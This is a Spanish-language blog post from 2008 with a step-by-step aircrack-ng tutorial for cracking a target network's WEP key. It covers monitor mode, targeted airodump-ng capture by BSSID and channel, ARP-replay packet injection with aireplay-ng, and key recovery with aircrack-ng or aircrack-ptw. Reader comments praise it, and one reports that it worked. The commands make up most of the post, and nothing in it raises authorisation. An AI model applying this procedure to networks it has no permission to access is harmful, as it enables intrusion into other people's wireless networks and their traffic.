Como Aircrack linux....

Publicado por Unknown en 10:25

1.- Primero hay que tener la tarjeta wireless bien configurada.

2.-ahora hay que ponerla en modo monitor, normalmente:

iwconfig ath0<----(interfaz) mode monitor.

en caso de que este método no sirva (con atheros no es valido este metodo):

airmon-ng start wifi0 [canal]

asi crearemos una nueva interfaz eth1 o ath1 que usaremos (para otros Drivers/Chipsets la que corresponda) tambien tenemos la opcion de poner un canal.

3. para ver que redes hay disponibles, usamos airodump-ng asi:

airodump-ng -w archivocaptura ath1 <-----(nueva interfaz)

4. Fijamos el objetivo, y miramos su bssid o mac y el canal en el que trabaja, para capturar específicamente para esa red:

airodump-ng –channel 9 -w archivocaptura ath1 <-----(nueva interfaz)

tambien se puede fijar la mira en una sola red inalambrica en caso de que haya varias al alcance de este modo:

airodump-ng –bssid XX:XX:XX:XX:XX:XX –channel N -w archivocaptura ath1

Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y N el canal en el que esta. La captura la haremos sin el –ivs, para que guarde los paquetes enteros, con vistas a poder usar aircrack-ptw que necesita que la captura se haga de esta forma.


5. Una vez que tenemos trabajando airodump-ng en un terminal, y tenemos algun cliente conectado a esa red (se ve en airodump-ng), abrimos otro terminal para la inyección de paquetes con aireplay:

aireplay-ng –arpreplay -b XX:XX:XX:XX:XX:XX - h YY:YY:YY:YY:YY:YY ath1<-----(nueva interfaz)


Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y YY:YY:YY:YY:YY:YY la del cliente conectado a esa red. Ahora deberíamos notar un incremento en la velocidad de captura de datos por parte de airodump-ng, en cuanto aireplay-ng capture y reinyecte paquetes ARP.

6. En cuanto tengamos unos cuantos paquetes capturados (80k-100k segun cada uno…) podemos poner a trabajar a aircrack-ng o usar aircrack-ptw que necesita menos datos capturados para sacar la clave.

aircrack-ng -0 -x -i 1 Nombre_archivocaptura.cap

-i 1 es para decirle que el índice de clave sera 1 (1-4) que es lo normal, esto lo podemos quitar si queremos. Por defecto busca contraseñas de 128bits, si es de 64 también la sacara pero tardara algo mas). Si se quiere indicar que la clave es de 64bits, podemos poner el parametro -n 64.

Para aircrack-ptw:

aircrack-ptw Nombre_archivocaptura.cap

Etiquetas:  

4 Comments:

  1. Anónimo said...
    6 de agosto de 2008, 11:00  
    Que buen como, me ha funcionado muy bien tio, ya hacia un tiempo que buscaba una ayuda asi ..... gracias Evol.

    eres la leche !!
    Anónimo said...
    6 de agosto de 2008, 18:07  
    Sí tío, ¡eres la hostia leche!
    Unknown said...
    7 de agosto de 2008, 15:16  
    jajajaja, la verdad no se que quiera decir con eso de ser la leche pero una cosa si aseguro, creo que soy de chocolate !!
    Anónimo said...
    8 de diciembre de 2008, 15:57  
    oye tio pero como configuro mi interfaz

Post a Comment



Entrada más reciente Entrada antigua Inicio

Subscribe to: Enviar comentarios (Atom)

infinityskins